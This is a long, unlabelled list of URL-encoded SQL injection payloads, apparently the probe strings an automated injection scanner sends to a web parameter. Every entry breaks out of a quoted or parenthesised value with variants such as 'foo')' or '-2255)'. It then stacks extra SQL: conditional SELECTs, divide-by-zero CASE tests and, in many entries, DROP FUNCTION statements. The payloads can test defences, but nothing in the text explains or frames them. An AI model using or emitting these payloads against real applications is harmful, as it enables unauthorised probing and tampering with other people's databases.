foo%27%29%29%3B%20IF%28%286247%3D6247%29%2CSELECT%206247%2CDROP%20FUNCTION%20EDkK%29%3B%23%20AND%20%28%28%27prjc%27%3D%27prjc foo%27%29%29%3B%20IF%28%288300%3D4472%29%2CSELECT%208300%2CDROP%20FUNCTION%20OTsw%29%3B%23%20AND%20%28%28%27FuAA%27%3D%27FuAA foo%27%29%29%29%3B%20IF%28%286905%3D8537%29%2CSELECT%206905%2CDROP%20FUNCTION%20jwWW%29%3B%23%20AND%20%28%28%28%27oUQH%27%3D%27oUQH foo%27%29%29%29%3B%20IF%28%286247%3D6247%29%2CSELECT%206247%2CDROP%20FUNCTION%20EDkK%29%3B%23%20AND%20%28%28%28%27niyS%27%3D%27niyS foo%27%29%29%29%3B%20IF%28%285258%3D7945%29%2CSELECT%205258%2CDROP%20FUNCTION%20ddlu%29%3B%23%20AND%20%28%28%28%27mCyh%27%3D%27mCyh foo%27%3B%20IF%28%288906%3D2761%29%2CSELECT%208906%2CDROP%20FUNCTION%20EDwC%29%3B%23%20AND%20%27knSI%27%3D%27knSI foo%27%3B%20IF%28%286247%3D6247%29%2CSELECT%206247%2CDROP%20FUNCTION%20EDkK%29%3B%23%20AND%20%27QqcT%27%3D%27QqcT foo%27%3B%20IF%28%283662%3D5326%29%2CSELECT%203662%2CDROP%20FUNCTION%20Rdfv%29%3B%23%20AND%20%27FnRQ%27%3D%27FnRQ foo%27%29%3B%20IF%28%284259%3D5808%29%2CSELECT%204259%2CDROP%20FUNCTION%20cwEh%29%3B%23%20AND%20%28%27KYFj%27%20LIKE%20%27KYFj foo%27%29%3B%20IF%28%286247%3D6247%29%2CSELECT%206247%2CDROP%20FUNCTION%20EDkK%29%3B%23%20AND%20%28%27Efal%27%20LIKE%20%27Efal foo%27%29%3B%20IF%28%285408%3D4752%29%2CSELECT%205408%2CDROP%20FUNCTION%20cqoG%29%3B%23%20AND%20%28%27bFBN%27%20LIKE%20%27bFBN foo%27%29%29%3B%20IF%28%289762%3D5545%29%2CSELECT%209762%2CDROP%20FUNCTION%20ixpC%29%3B%23%20AND%20%28%28%27ARZE%27%20LIKE%20%27ARZE foo%27%29%29%3B%20IF%28%286247%3D6247%29%2CSELECT%206247%2CDROP%20FUNCTION%20EDkK%29%3B%23%20AND%20%28%28%27emMB%27%20LIKE%20%27emMB foo%27%29%29%3B%20IF%28%289469%3D6272%29%2CSELECT%209469%2CDROP%20FUNCTION%20Azzk%29%3B%23%20AND%20%28%28%27aurs%27%20LIKE%20%27aurs foo%27%29%29%29%3B%20IF%28%283664%3D4265%29%2CSELECT%203664%2CDROP%20FUNCTION%20gTFI%29%3B%23%20AND%20%28%28%28%27wDtJ%27%20LIKE%20%27wDtJ foo%27%29%29%29%3B%20IF%28%286247%3D6247%29%2CSELECT%206247%2CDROP%20FUNCTION%20EDkK%29%3B%23%20AND%20%28%28%28%27cVWO%27%20LIKE%20%27cVWO foo%27%29%29%29%3B%20IF%28%288268%3D5203%29%2CSELECT%208268%2CDROP%20FUNCTION%20pMUK%29%3B%23%20AND%20%28%28%28%27QfDr%27%20LIKE%20%27QfDr foo%27%3B%20IF%28%288038%3D3401%29%2CSELECT%208038%2CDROP%20FUNCTION%20MzVM%29%3B%23%20AND%20%27KGyD%27%20LIKE%20%27KGyD foo%27%3B%20IF%28%286247%3D6247%29%2CSELECT%206247%2CDROP%20FUNCTION%20EDkK%29%3B%23%20AND%20%27wPkZ%27%20LIKE%20%27wPkZ foo%27%3B%20IF%28%282743%3D7294%29%2CSELECT%202743%2CDROP%20FUNCTION%20nKYP%29%3B%23%20AND%20%27eeAX%27%20LIKE%20%27eeAX foo%22%29%3B%20IF%28%281712%3D6391%29%2CSELECT%201712%2CDROP%20FUNCTION%20Bsbn%29%3B%23%20AND%20%28%22cNvM%22%3D%22cNvM foo%22%29%3B%20IF%28%286247%3D6247%29%2CSELECT%206247%2CDROP%20FUNCTION%20EDkK%29%3B%23%20AND%20%28%22kjrX%22%3D%22kjrX foo%22%29%3B%20IF%28%284401%3D7730%29%2CSELECT%204401%2CDROP%20FUNCTION%20laIT%29%3B%23%20AND%20%28%22YPkF%22%3D%22YPkF foo%22%29%29%3B%20IF%28%283752%3D3010%29%2CSELECT%203752%2CDROP%20FUNCTION%20BeJY%29%3B%23%20AND%20%28%28%22aSFW%22%3D%22aSFW foo%22%29%29%3B%20IF%28%286247%3D6247%29%2CSELECT%206247%2CDROP%20FUNCTION%20EDkK%29%3B%23%20AND%20%28%28%22oDpW%22%3D%22oDpW foo%22%29%29%3B%20IF%28%288137%3D3373%29%2CSELECT%208137%2CDROP%20FUNCTION%20QRiw%29%3B%23%20AND%20%28%28%22XTwP%22%3D%22XTwP foo%22%29%29%29%3B%20IF%28%281265%3D7419%29%2CSELECT%201265%2CDROP%20FUNCTION%20BGZi%29%3B%23%20AND%20%28%28%28%22qGZf%22%3D%22qGZf foo%22%29%29%29%3B%20IF%28%286247%3D6247%29%2CSELECT%206247%2CDROP%20FUNCTION%20EDkK%29%3B%23%20AND%20%28%28%28%22fUNR%22%3D%22fUNR foo%22%29%29%29%3B%20IF%28%285359%3D6979%29%2CSELECT%205359%2CDROP%20FUNCTION%20uvXR%29%3B%23%20AND%20%28%28%28%22hmAm%22%3D%22hmAm foo%22%3B%20IF%28%287908%3D3664%29%2CSELECT%207908%2CDROP%20FUNCTION%20ObQP%29%3B%23%20AND%20%22mhdJ%22%3D%22mhdJ foo%22%3B%20IF%28%286247%3D6247%29%2CSELECT%206247%2CDROP%20FUNCTION%20EDkK%29%3B%23%20AND%20%22FNAU%22%3D%22FNAU foo%22%3B%20IF%28%286489%3D1742%29%2CSELECT%206489%2CDROP%20FUNCTION%20AyNt%29%3B%23%20AND%20%22HbVL%22%3D%22HbVL foo%22%29%3B%20IF%28%284746%3D1829%29%2CSELECT%204746%2CDROP%20FUNCTION%20apHb%29%3B%23%20AND%20%28%22YydY%22%20LIKE%20%22YydY foo%22%29%3B%20IF%28%286247%3D6247%29%2CSELECT%206247%2CDROP%20FUNCTION%20EDkK%29%3B%23%20AND%20%28%22CFWn%22%20LIKE%20%22CFWn foo%22%29%3B%20IF%28%285325%3D3736%29%2CSELECT%205325%2CDROP%20FUNCTION%20oCCM%29%3B%23%20AND%20%28%22XRSY%22%20LIKE%20%22XRSY foo%22%29%29%3B%20IF%28%287565%3D9776%29%2CSELECT%207565%2CDROP%20FUNCTION%20iyAg%29%3B%23%20AND%20%28%28%22QdBm%22%20LIKE%20%22QdBm foo%22%29%29%3B%20IF%28%286247%3D6247%29%2CSELECT%206247%2CDROP%20FUNCTION%20EDkK%29%3B%23%20AND%20%28%28%22jhsP%22%20LIKE%20%22jhsP foo%22%29%29%3B%20IF%28%287023%3D3386%29%2CSELECT%207023%2CDROP%20FUNCTION%20oAic%29%3B%23%20AND%20%28%28%22xQBC%22%20LIKE%20%22xQBC foo%22%29%29%29%3B%20IF%28%284740%3D7218%29%2CSELECT%204740%2CDROP%20FUNCTION%20VpwO%29%3B%23%20AND%20%28%28%28%22WSxn%22%20LIKE%20%22WSxn foo%22%29%29%29%3B%20IF%28%286247%3D6247%29%2CSELECT%206247%2CDROP%20FUNCTION%20EDkK%29%3B%23%20AND%20%28%28%28%22whpV%22%20LIKE%20%22whpV foo%22%29%29%29%3B%20IF%28%289586%3D9757%29%2CSELECT%209586%2CDROP%20FUNCTION%20RvBw%29%3B%23%20AND%20%28%28%28%22ZHGL%22%20LIKE%20%22ZHGL foo%22%3B%20IF%28%286153%3D9562%29%2CSELECT%206153%2CDROP%20FUNCTION%20Vfoe%29%3B%23%20AND%20%22QOGk%22%20LIKE%20%22QOGk foo%22%3B%20IF%28%286247%3D6247%29%2CSELECT%206247%2CDROP%20FUNCTION%20EDkK%29%3B%23%20AND%20%22Umlt%22%20LIKE%20%22Umlt foo%22%3B%20IF%28%287616%3D8885%29%2CSELECT%207616%2CDROP%20FUNCTION%20uvOn%29%3B%23%20AND%20%22MLoV%22%20LIKE%20%22MLoV foo%29%20WHERE%206869%3D6869%3B%20IF%28%283074%3D8791%29%2CSELECT%203074%2CDROP%20FUNCTION%20yirv%29%3B%23 foo%29%20WHERE%208711%3D8711%3B%20IF%28%286247%3D6247%29%2CSELECT%206247%2CDROP%20FUNCTION%20EDkK%29%3B%23 foo%29%20WHERE%207967%3D7967%3B%20IF%28%283636%3D7753%29%2CSELECT%203636%2CDROP%20FUNCTION%20jrFH%29%3B%23 foo%27%29%20WHERE%207793%3D7793%3B%20IF%28%281884%3D2218%29%2CSELECT%201884%2CDROP%20FUNCTION%20jNGr%29%3B%23 foo%27%29%20WHERE%209552%3D9552%3B%20IF%28%286247%3D6247%29%2CSELECT%206247%2CDROP%20FUNCTION%20EDkK%29%3B%23 foo%27%29%20WHERE%202503%3D2503%3B%20IF%28%285366%3D2380%29%2CSELECT%205366%2CDROP%20FUNCTION%20DPev%29%3B%23 foo%27%20WHERE%207788%3D7788%3B%20IF%28%285355%3D3789%29%2CSELECT%205355%2CDROP%20FUNCTION%20JEWF%29%3B%23 foo%27%20WHERE%207517%3D7517%3B%20IF%28%286247%3D6247%29%2CSELECT%206247%2CDROP%20FUNCTION%20EDkK%29%3B%23 foo%27%20WHERE%208525%3D8525%3B%20IF%28%289265%3D9372%29%2CSELECT%209265%2CDROP%20FUNCTION%20nqaW%29%3B%23 foo%22%20WHERE%203670%3D3670%3B%20IF%28%284058%3D1959%29%2CSELECT%204058%2CDROP%20FUNCTION%20VYpD%29%3B%23 foo%22%20WHERE%208752%3D8752%3B%20IF%28%286247%3D6247%29%2CSELECT%206247%2CDROP%20FUNCTION%20EDkK%29%3B%23 foo%22%20WHERE%204887%3D4887%3B%20IF%28%281743%3D4440%29%2CSELECT%201743%2CDROP%20FUNCTION%20wZdt%29%3B%23 foo%27%20%7C%7C%20%28SELECT%203536%20FROM%20DUAL%20WHERE%209465%3D9465%3B%20IF%28%288260%3D7882%29%2CSELECT%208260%2CDROP%20FUNCTION%20LBbK%29%3B%23%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%203318%20FROM%20DUAL%20WHERE%204218%3D4218%3B%20IF%28%286247%3D6247%29%2CSELECT%206247%2CDROP%20FUNCTION%20EDkK%29%3B%23%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%201024%20FROM%20DUAL%20WHERE%207911%3D7911%3B%20IF%28%288803%3D2206%29%2CSELECT%208803%2CDROP%20FUNCTION%20ZPLh%29%3B%23%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%201594%20WHERE%206932%3D6932%3B%20IF%28%286097%3D3787%29%2CSELECT%206097%2CDROP%20FUNCTION%20czUr%29%3B%23%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%208394%20WHERE%205099%3D5099%3B%20IF%28%286247%3D6247%29%2CSELECT%206247%2CDROP%20FUNCTION%20EDkK%29%3B%23%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%202513%20WHERE%209174%3D9174%3B%20IF%28%284093%3D6534%29%2CSELECT%204093%2CDROP%20FUNCTION%20uaFm%29%3B%23%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%206470%20FROM%20DUAL%20WHERE%203923%3D3923%3B%20IF%28%283946%3D4776%29%2CSELECT%203946%2CDROP%20FUNCTION%20ngtU%29%3B%23%20%29 foo%20%2B%20%28SELECT%203964%20FROM%20DUAL%20WHERE%201908%3D1908%3B%20IF%28%286247%3D6247%29%2CSELECT%206247%2CDROP%20FUNCTION%20EDkK%29%3B%23%20%29 foo%20%2B%20%28SELECT%209226%20FROM%20DUAL%20WHERE%202834%3D2834%3B%20IF%28%284343%3D7944%29%2CSELECT%204343%2CDROP%20FUNCTION%20UAUN%29%3B%23%20%29 foo%20%2B%20%28SELECT%207113%20WHERE%204225%3D4225%3B%20IF%28%285331%3D3870%29%2CSELECT%205331%2CDROP%20FUNCTION%20cuxe%29%3B%23%20%29 foo%20%2B%20%28SELECT%208139%20WHERE%201598%3D1598%3B%20IF%28%286247%3D6247%29%2CSELECT%206247%2CDROP%20FUNCTION%20EDkK%29%3B%23%20%29 foo%20%2B%20%28SELECT%205934%20WHERE%207594%3D7594%3B%20IF%28%286215%3D7903%29%2CSELECT%206215%2CDROP%20FUNCTION%20Dseu%29%3B%23%20%29 foo%27%20%2B%20%28SELECT%20%27agMB%27%20FROM%20DUAL%20WHERE%202375%3D2375%3B%20IF%28%282809%3D6548%29%2CSELECT%202809%2CDROP%20FUNCTION%20tjnA%29%3B%23%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27jtiZ%27%20FROM%20DUAL%20WHERE%201119%3D1119%3B%20IF%28%286247%3D6247%29%2CSELECT%206247%2CDROP%20FUNCTION%20EDkK%29%3B%23%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27Jxee%27%20FROM%20DUAL%20WHERE%206468%3D6468%3B%20IF%28%289422%3D2812%29%2CSELECT%209422%2CDROP%20FUNCTION%20Bocm%29%3B%23%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27eBaZ%27%20WHERE%209203%3D9203%3B%20IF%28%283601%3D4813%29%2CSELECT%203601%2CDROP%20FUNCTION%20HWkK%29%3B%23%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27mqcv%27%20WHERE%201047%3D1047%3B%20IF%28%286247%3D6247%29%2CSELECT%206247%2CDROP%20FUNCTION%20EDkK%29%3B%23%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27fEbj%27%20WHERE%205487%3D5487%3B%20IF%28%289840%3D3966%29%2CSELECT%209840%2CDROP%20FUNCTION%20TPdk%29%3B%23%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%3B%20IF%28%287320%3D3904%29%2CSELECT%207320%2CDROP%20FUNCTION%20nIae%29%3B%23%20%23 foo%27%20IN%20BOOLEAN%20MODE%29%3B%20IF%28%286247%3D6247%29%2CSELECT%206247%2CDROP%20FUNCTION%20EDkK%29%3B%23%20%23 foo%27%20IN%20BOOLEAN%20MODE%29%3B%20IF%28%289155%3D4632%29%2CSELECT%209155%2CDROP%20FUNCTION%20XkeY%29%3B%23%20%23 -2255%29%3B%20SELECT%20%28CASE%20WHEN%20%282365%3D6912%29%20THEN%202365%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -5536%29%3B%20SELECT%20%28CASE%20WHEN%20%286176%3D6176%29%20THEN%206176%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -6146%29%3B%20SELECT%20%28CASE%20WHEN%20%288076%3D4507%29%20THEN%208076%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -9986%27%29%3B%20SELECT%20%28CASE%20WHEN%20%282818%3D2037%29%20THEN%202818%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -2525%27%29%3B%20SELECT%20%28CASE%20WHEN%20%286176%3D6176%29%20THEN%206176%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -8844%27%29%3B%20SELECT%20%28CASE%20WHEN%20%281935%3D7324%29%20THEN%201935%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -9877%27%3B%20SELECT%20%28CASE%20WHEN%20%283993%3D4523%29%20THEN%203993%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -5365%27%3B%20SELECT%20%28CASE%20WHEN%20%286176%3D6176%29%20THEN%206176%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -8730%27%3B%20SELECT%20%28CASE%20WHEN%20%284420%3D8110%29%20THEN%204420%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -2026%22%3B%20SELECT%20%28CASE%20WHEN%20%289583%3D6724%29%20THEN%209583%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -1285%22%3B%20SELECT%20%28CASE%20WHEN%20%286176%3D6176%29%20THEN%206176%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -3021%22%3B%20SELECT%20%28CASE%20WHEN%20%282912%3D8249%29%20THEN%202912%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -8638%29%3B%20SELECT%20%28CASE%20WHEN%20%284851%3D9887%29%20THEN%204851%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%288958%3D8958 -6670%29%3B%20SELECT%20%28CASE%20WHEN%20%286176%3D6176%29%20THEN%206176%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%286870%3D6870 -7296%29%3B%20SELECT%20%28CASE%20WHEN%20%286342%3D4736%29%20THEN%206342%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%283677%3D3677 -2371%29%29%3B%20SELECT%20%28CASE%20WHEN%20%289610%3D4926%29%20THEN%209610%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%282023%3D2023 -1064%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286176%3D6176%29%20THEN%206176%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%289242%3D9242 -4979%29%29%3B%20SELECT%20%28CASE%20WHEN%20%287420%3D7114%29%20THEN%207420%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%286041%3D6041 -6803%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%282290%3D7512%29%20THEN%202290%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%285879%3D5879 -2463%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286176%3D6176%29%20THEN%206176%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%283968%3D3968 -5069%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%284250%3D3987%29%20THEN%204250%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%283916%3D3916 -8871%3B%20SELECT%20%28CASE%20WHEN%20%287293%3D1662%29%20THEN%207293%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -3307%3B%20SELECT%20%28CASE%20WHEN%20%286176%3D6176%29%20THEN%206176%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -6099%3B%20SELECT%20%28CASE%20WHEN%20%283525%3D7233%29%20THEN%203525%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -1429%27%29%3B%20SELECT%20%28CASE%20WHEN%20%282450%3D8565%29%20THEN%202450%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%27ZtdS%27%3D%27ZtdS -5418%27%29%3B%20SELECT%20%28CASE%20WHEN%20%286176%3D6176%29%20THEN%206176%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%27mFXv%27%3D%27mFXv -2642%27%29%3B%20SELECT%20%28CASE%20WHEN%20%282384%3D2249%29%20THEN%202384%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%27HccT%27%3D%27HccT -6540%27%29%29%3B%20SELECT%20%28CASE%20WHEN%20%289365%3D1441%29%20THEN%209365%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%27Bcpq%27%3D%27Bcpq -1252%27%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286176%3D6176%29%20THEN%206176%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%27CFOD%27%3D%27CFOD -9828%27%29%29%3B%20SELECT%20%28CASE%20WHEN%20%281323%3D7260%29%20THEN%201323%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%27fLnU%27%3D%27fLnU -4772%27%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286865%3D5035%29%20THEN%206865%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%28%27Zcna%27%3D%27Zcna -1362%27%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286176%3D6176%29%20THEN%206176%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%28%27GRmj%27%3D%27GRmj -4495%27%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%289858%3D5856%29%20THEN%209858%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%28%27jaao%27%3D%27jaao -5432%27%3B%20SELECT%20%28CASE%20WHEN%20%289597%3D1034%29%20THEN%209597%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%27YYQA%27%3D%27YYQA -7946%27%3B%20SELECT%20%28CASE%20WHEN%20%286176%3D6176%29%20THEN%206176%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%27NBax%27%3D%27NBax -9318%27%3B%20SELECT%20%28CASE%20WHEN%20%286990%3D3681%29%20THEN%206990%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%27AMAa%27%3D%27AMAa -3594%27%29%3B%20SELECT%20%28CASE%20WHEN%20%281954%3D5483%29%20THEN%201954%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%27MjZB%27%20LIKE%20%27MjZB -8801%27%29%3B%20SELECT%20%28CASE%20WHEN%20%286176%3D6176%29%20THEN%206176%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%27XiWH%27%20LIKE%20%27XiWH -9474%27%29%3B%20SELECT%20%28CASE%20WHEN%20%287035%3D7304%29%20THEN%207035%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%27Kkdm%27%20LIKE%20%27Kkdm -7713%27%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286231%3D2929%29%20THEN%206231%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%27pXnP%27%20LIKE%20%27pXnP -9566%27%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286176%3D6176%29%20THEN%206176%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%27IdVn%27%20LIKE%20%27IdVn -3126%27%29%29%3B%20SELECT%20%28CASE%20WHEN%20%285816%3D7701%29%20THEN%205816%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%27zwIJ%27%20LIKE%20%27zwIJ -5933%27%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286426%3D6088%29%20THEN%206426%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%28%27PCxD%27%20LIKE%20%27PCxD -5231%27%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286176%3D6176%29%20THEN%206176%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%28%27mIlO%27%20LIKE%20%27mIlO -5882%27%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%285163%3D8480%29%20THEN%205163%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%28%27sxgv%27%20LIKE%20%27sxgv -8977%27%3B%20SELECT%20%28CASE%20WHEN%20%285750%3D8315%29%20THEN%205750%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%27VXXB%27%20LIKE%20%27VXXB -5689%27%3B%20SELECT%20%28CASE%20WHEN%20%286176%3D6176%29%20THEN%206176%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%27ukdJ%27%20LIKE%20%27ukdJ -8964%27%3B%20SELECT%20%28CASE%20WHEN%20%286532%3D3246%29%20THEN%206532%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%27lsLB%27%20LIKE%20%27lsLB -9463%22%29%3B%20SELECT%20%28CASE%20WHEN%20%283759%3D5502%29%20THEN%203759%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%22VUBc%22%3D%22VUBc -7400%22%29%3B%20SELECT%20%28CASE%20WHEN%20%286176%3D6176%29%20THEN%206176%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%22zqMu%22%3D%22zqMu -6907%22%29%3B%20SELECT%20%28CASE%20WHEN%20%283954%3D5801%29%20THEN%203954%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%22hZEL%22%3D%22hZEL -1015%22%29%29%3B%20SELECT%20%28CASE%20WHEN%20%288368%3D6473%29%20THEN%208368%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%22Oucn%22%3D%22Oucn -6746%22%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286176%3D6176%29%20THEN%206176%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%22KDtb%22%3D%22KDtb -8040%22%29%29%3B%20SELECT%20%28CASE%20WHEN%20%282783%3D9396%29%20THEN%202783%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%22rdne%22%3D%22rdne -8709%22%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%282075%3D8626%29%20THEN%202075%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%28%22TyHn%22%3D%22TyHn -9273%22%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286176%3D6176%29%20THEN%206176%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%28%22vOHy%22%3D%22vOHy -1478%22%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%285191%3D4228%29%20THEN%205191%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%28%22Kxxp%22%3D%22Kxxp -6368%22%3B%20SELECT%20%28CASE%20WHEN%20%281647%3D5590%29%20THEN%201647%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%22SQgl%22%3D%22SQgl -9144%22%3B%20SELECT%20%28CASE%20WHEN%20%286176%3D6176%29%20THEN%206176%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%22PxBb%22%3D%22PxBb -7197%22%3B%20SELECT%20%28CASE%20WHEN%20%284026%3D7212%29%20THEN%204026%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%22KOEf%22%3D%22KOEf -5031%22%29%3B%20SELECT%20%28CASE%20WHEN%20%286133%3D7841%29%20THEN%206133%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%22EPHI%22%20LIKE%20%22EPHI -5482%22%29%3B%20SELECT%20%28CASE%20WHEN%20%286176%3D6176%29%20THEN%206176%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%22guBu%22%20LIKE%20%22guBu -4456%22%29%3B%20SELECT%20%28CASE%20WHEN%20%281607%3D7900%29%20THEN%201607%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%22psgO%22%20LIKE%20%22psgO -3240%22%29%29%3B%20SELECT%20%28CASE%20WHEN%20%281057%3D8878%29%20THEN%201057%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%22wXEU%22%20LIKE%20%22wXEU -6677%22%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286176%3D6176%29%20THEN%206176%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%22Jfnx%22%20LIKE%20%22Jfnx -8441%22%29%29%3B%20SELECT%20%28CASE%20WHEN%20%288641%3D6471%29%20THEN%208641%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%22IAPt%22%20LIKE%20%22IAPt -2115%22%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%285086%3D9343%29%20THEN%205086%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%28%22Qrar%22%20LIKE%20%22Qrar -9147%22%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286176%3D6176%29%20THEN%206176%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%28%22RZEx%22%20LIKE%20%22RZEx -1308%22%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%288278%3D5886%29%20THEN%208278%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%28%22fkLA%22%20LIKE%20%22fkLA -9713%22%3B%20SELECT%20%28CASE%20WHEN%20%282439%3D2657%29%20THEN%202439%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%22TUUd%22%20LIKE%20%22TUUd -5076%22%3B%20SELECT%20%28CASE%20WHEN%20%286176%3D6176%29%20THEN%206176%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%22mwXH%22%20LIKE%20%22mwXH -7298%22%3B%20SELECT%20%28CASE%20WHEN%20%283492%3D7894%29%20THEN%203492%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%22FzWY%22%20LIKE%20%22FzWY -4569%29%20WHERE%208874%3D8874%3B%20SELECT%20%28CASE%20WHEN%20%284760%3D8718%29%20THEN%204760%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -1138%29%20WHERE%209465%3D9465%3B%20SELECT%20%28CASE%20WHEN%20%286176%3D6176%29%20THEN%206176%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -9300%29%20WHERE%201957%3D1957%3B%20SELECT%20%28CASE%20WHEN%20%286858%3D2760%29%20THEN%206858%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -3873%27%29%20WHERE%206047%3D6047%3B%20SELECT%20%28CASE%20WHEN%20%287645%3D7292%29%20THEN%207645%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -6711%27%29%20WHERE%208838%3D8838%3B%20SELECT%20%28CASE%20WHEN%20%286176%3D6176%29%20THEN%206176%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -4282%27%29%20WHERE%208043%3D8043%3B%20SELECT%20%28CASE%20WHEN%20%286010%3D8842%29%20THEN%206010%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- 